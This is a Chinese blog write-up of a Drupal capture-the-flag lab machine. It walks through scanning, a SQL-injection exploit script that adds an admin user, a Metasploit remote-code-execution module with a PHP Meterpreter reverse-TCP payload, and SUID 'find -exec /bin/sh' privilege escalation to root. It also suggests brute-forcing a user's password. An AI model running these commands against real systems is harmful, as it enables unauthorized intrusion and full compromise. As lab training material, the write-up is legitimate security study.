Drupal靶机实战

于 2023-06-27 17:46:18 发布
阅读量218 收藏 2
点赞数 1
分类专栏: 保护国家网络安全 文章标签: Drupal靶机 kali 网络安全 find提权 MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/131422400
版权

Drupal靶机

免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护我们的网络安全!!!

文章目录

信息收集

1.扫描网段

nmap 192.168.63.0/24 -p 80

扫描出靶机 192.168.63.134

image-20230627161852099

2.IP详细扫描

nmap 192.168.63.134 -A -p-

发现以下路径:

http://192.168.63.134/INSTALL.mysql.txt
http://192.168.63.134/INSTALL.pgsql.txt
http://192.168.63.134/INSTALL.sqlite.txt
http://192.168.63.134/install.php
http://192.168.63.134/INSTALL.txt
http://192.168.63.134/LICENSE.txt
http://192.168.63.134/MAINTAINERS.txt

3.敏感目录扫描

nikto -h http://192.168.63.134
dirb http://192.168.63.134

发现上面两个工具都扫描不出其他目录,然后就尝试另外一个工具gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html -u http://192.168.63.134

最终扫描出以下路径:

http://192.168.63.134/search
http://192.168.63.134/cron.php
http://192.168.63.134/0
http://192.168.63.134/usr
http://192.168.63.134/admin
http://192.168.63.134/burmese.html
http://192.168.63.134/misc/
http://192.168.63.134/themes/
http://192.168.63.134/modules/
http://192.168.63.134/scripts/

经过以上路径尝试,发现没有什么有用的信息,都是没有权限访问。

渗透阶段

1.搜索指纹

通过以上路径的探索,发现没有可利用的信息之后,于是想通过 searchsploit工具来查找指纹,通过靶机首页可以发现,这个靶机是通过 drupal框架来做的,于是使用以下命令:

searchsploit drupal

image-20230627163931684

2.利用漏洞库文件

可以发现这个框架有很多漏洞利用库,在其中发现了一个 SQL注入的利用文件,这个文件可以用来添加管理员用户,于是使用

searchsploit -m 34992.py 下载下来,下载之后需要使用 python2 执行,然后可以看到如何使用:

image-20230627164320432

于是输入以下命令使用:

python2 34992.py -t http://192.168.63.134 -u yuan -p 123456

image-20230627164504333

可以看到,成功添加管理员用户,于是进入首页输入用户名密码,成功登录:

image-20230627164613734

3.探索后台

进入这个后台之后,经过搜索,找到文件上传去上传php文件,发现被过滤了,最后只找到有点小用的flag3信息:

image-20230627164856261

这个信息告诉我们,使用 perm可以帮助我们找到密码,但是需要去执行指令 -exec,但是这个网站没有地方有命令注入的漏洞啊,所以没办法执行,然后继续找找其他线索,最后还是没有发现。所以只能从其他方向入手了。

4.MSF漏洞利用

​ 网站找不到可以利用的线索,接下来就只能依靠 msf了,于是进入 msfconsole,通过指纹搜索search drupal

image-20230627165314361

发现有很多漏洞利用库,有几个远程代码执行漏洞,经过多次尝试,发现只有第二个能利用,利用步骤如下:

1.使用模块

use 1

2.查看配置信息

show options

image-20230627165508488

发现我们需要配置靶机地址,靶机IP,靶机端口

3.设置payload

由于这个网站是PHP写的,经过前面的信息收集很多地方都可以发现,所以payload为php

set payload php/meterpreter/reverse_tcp

4.设置 IP

set rhosts 192.168.63.134

5.设置端口

set rport 80

6.启动攻击:run

image-20230627165852034

成功拿到 meterpreter

5.探索网站目录的shell

拿到 meterpreter之后,输入shell进入终端,输入 ls可以看到当前目录信息,但是终端显示不好,于是输入以下命令优化终端显示:

python -c "import pty;pty.spawn('/bin/bash')"

image-20230627170147689

进入这个网站的终端shell之后,进行探索,首先去家目录,发现没有什么有用的信息,于是再看看 /etc/passwd文件:

image-20230627170505852

发现有一个普通用户 flag4,没有其他有用的信息了,得想到一些提权方式:

比如sudo,suid,定时任务,/etc/passwd可写,内核提权,具体的提权详细步骤可以百度,我经过尝试之后,发现在这个网站目录下可以直接执行 搜索 suid可执行程序的命令:

find / -perm -u=s -type f 2>/dev/null

image-20230627171345582

执行后发现,这个网站目录下具有执行 find命令的root权限,于是可以借助 find -exec来执行我们想要的命令,比如我们想要进入终端,于是可以输入以下命令:

find /bin -exec '/bin/bash' \;

image-20230627172021352

可以看到用户身份还是网站目录用户,所以可以尝试一下 /bin/sh

find /bin -exec '/bin/sh' \;

然后输入 whoami,可以看到,身份为root,提权成功。

image-20230627172243977

总结

​ 通过kali的漏洞利用库的远程代码执行,进入网站目录之后,我们具有惯性思维,就是直接去家目录找相关的信息,想找到普通用户的密码线索,然后基于普通用户进行提权,其实有时候思维不能定死在这里了,既然进入了网站的目录用户终端,那不一定非要普通用户的权限才能提权,也许网站目录用户也具有一些root用户的程序执行权限,所以可以先尝试提权姿势:suidsudo,定时任务等,实在没办法再从普通用户入手,拿到普通用户的权限之后再找线索。
​ 但是,有的网站目录用户是没有find执行权限或者sudo命令,于是无法使用sudo提权或者suid提权,所以这个时候想进一步提权就需要先拿到普通用户的权限,由于进入网站目录之后可以查看 /etc/passwd权限,可以发现有个flag4普通用户,但是没有其他信息了,于是就可以尝试密码爆破,因为已经确定了用户名,密码如果强大的话,爆破成功只是时间问题。

yuan_boss
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【vulnhub】【DC系列】DC7 - Drupal drush靶机
Nicky_Zheng的博客
01-26 256
1、信息收集 使用netdiscover发现靶机 ip 为:192.168.57.153 nmap扫描发现开放有 20/80端口,运行的CMS 为 Drupal 8 访问页面提示从其他入口下手 页面上存在 Twitter 账号,搜索可发现 github 地址 此处直接根据Twitter 账号 搜索 github,得到仓库地址dc7-user 存在config.php文件,里面记录有用户名和密码,尝试使用该用户名登陆服务器 <?php $servername = "localhost"; $us
Drupal远程代码执行漏洞
最新发布
longwanlian的博客
11-29 603
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。2018年3月28日,Drupal Security Team官方发布公告称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞执行恶意代码。
[Vulnhub] DC-1
weixin_63231007的博客
07-06 686
目录信息搜集msf--Drupal漏洞利用SUID提权Drupal使用CVE2014-3704 添加管理员账号下载地址:DC: 1 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ip靶机ip:192.168.236.137nmap -A 192.168.236.137 扫描一下靶机开放哪些服务 访问 靶机ip 发现是用Drupal搭建的网页 他是存在一些漏洞可以被利用的。我们之前在Lampiao 靶机中进行了msf--Drupal漏洞利用。我们这里打开msfconsol
vulnhub靶机DC-1渗透笔记
liver100day的博客
06-01 265
DC-1靶机渗透 靶机环境搭建: 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-1 IP地址 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 渗透过程 1.信息收集 1.1 IP地址确认 netdiscover 可以确认目标靶机IP地址为 192.168.75.141 还可以使用 arp-scan -l 同样扫描出目标靶机IP地址 1.2 爆破端口信息 既然知道了靶机的IP地址,那就理所应当的扫描下端口啦 这里使用端口扫描神器
DC-1 靶机笔记
MZa1213123的博客
02-21 1137
1、搭建好靶机后,由于采用的是桥接模式,前对网段快速 ping 一下,(因为试过很多次 nmap 都要等很久,不知道什么原因)。也可用 sudo arp-scan -l 查看 arp 缓存得知目的主机的 ip 地址,前提是要在桥接模式。 2、使用 nmap 进行信息收集 可知 80 端口有 drupal 搭建的网站,而且是 drupal 7 经过在网上的一番搜索如何入手时 都是使用 msfconsole 对 drupal 进行渗透 对 drupal 在 msfconsole 中 .
drupal-7.14
06-08
drupal-7.14
drupal-7.13
06-08
drupal-7.13
drupal文件系统概述
09-28
主要为大家介绍了drupal文件系统,讲述了drupal文件系统的分类,重点讲述了钩子函数的用法,需要的朋友可以参考下
Drupal v7.44
12-07
Drupal7正式版本终于发布了!渴望已久、期待已久的drupal 7就在我们眼前。drupal从最初的一个讨论bbs发展到现在如此大规模的CMS,真是奇迹啊!让我们一起步入drupal 7的强大时代,相信drupal7会是drupal发展过程中...
Drupal v7.50
12-06
Drupal7正式版本终于发布了!渴望已久、期待已久的drupal 7就在我们眼前。drupal从最初的一个讨论bbs发展到现在如此大规模的CMS,真是奇迹啊!让我们一起步入drupal 7的强大时代,相信drupal7会是drupal发展过程中...
初试DC-1靶机渗透
kimoro_x的博客
04-20 637
1.下载DC-1靶机 2.将DC-1.ova导入到VirtualBox中(具体流程不再赘述) 3.将靶机和kali(我的是在VMware下的)设置在同一网段下(具体步骤可参考此链接 4.用ifconfig查看本机IP 5.用netdiscover -r ip/netmask来探测靶场IP 6.经测试192.168.56.101为目标靶机ip,于是我们可以使用nmap -sV 192.168.5...
Drupal 能干什么?
COMSHARP CMS 专栏
01-10 2236
Drupal 是一个出色的 CMS (内容管理系统),然而,如果你只想做一个简单的传统站点,Drupal 就大材小用了,Drupal 是一个适合开发者使用的平台,它拥有众多模块,插件,扩展,API,以及庞大的开发社区,你可以使用 Drupal 实现几乎任何类型的站点,本文列举了16个著名的站点,这些站点都可以用 Drupal 实现。1. Digg 站点 可以模仿 D
OSCP-1-8-Lampiao(Drupal漏洞、msf利用、web存在sites文件夹配置设置密码、脏牛漏洞)
墨痕诉清风的博客
08-13 133
发现启动了Drupal 7。80端口没有任何发现。
[Vulnhub] Lampiao
weixin_63231007的博客
07-03 605
下载链接:Lampião: 1 ~ VulnHub nmap 扫描一下 发现靶机ip:192.168.236.134nmap -A -p 1-65535 192.168.236.134扫一下靶机ip,看看开放了哪些服务: 访问80,没有信息,试试这个1898发现一个登录框,类似于博客 dirb 扫描一下目录 dirb http://192.168.236.134:1898 访问其中的,发现了是Drupal msf--Drupal漏洞利用 msfconsole 查找一下msf中Drupal可以利用的漏洞
一次Drupal的渗透测试
BROTHERYY的博客
03-19 1783
此次评估的环境为:1台web服务器 服务需求:该服务器对外提供web服务 网络实际应用:10.35.0.211 实际ip分配:10.35.0.245 自身环境为:win7+kali 使用工具:whatweb、nmap、msf、nc 以下所有操作都是在得到授权后进行 —————————————————————————————————————— 首先进行信息搜集,使用whatweb查看网站信息 将所...
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3262
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4445
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
4.15基于metasploit框架的web应用渗透技术
u012558785的专栏
10-15 1397
1.辅助模块 wmap Web扫描器 load wmap help wmap_sites -a http://202.112.50.74 wmap_sites -l msf > load wmap .-.-.-..-.-.-..---..---. | | | || | | || | || |-' `-----'`-'-'-'`-^-'`-' [WMAP 1.5.1] === 
Linux安装drupal
10-20
安装Drupal需要先完成LAMP的搭建,如果没有安装可以参照之前提供的文章或者使用tasksel安装。接下来,按照以下步骤安装Drupal: 1. 下载Drupal:使用wget命令下载Drupal,例如:wget ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值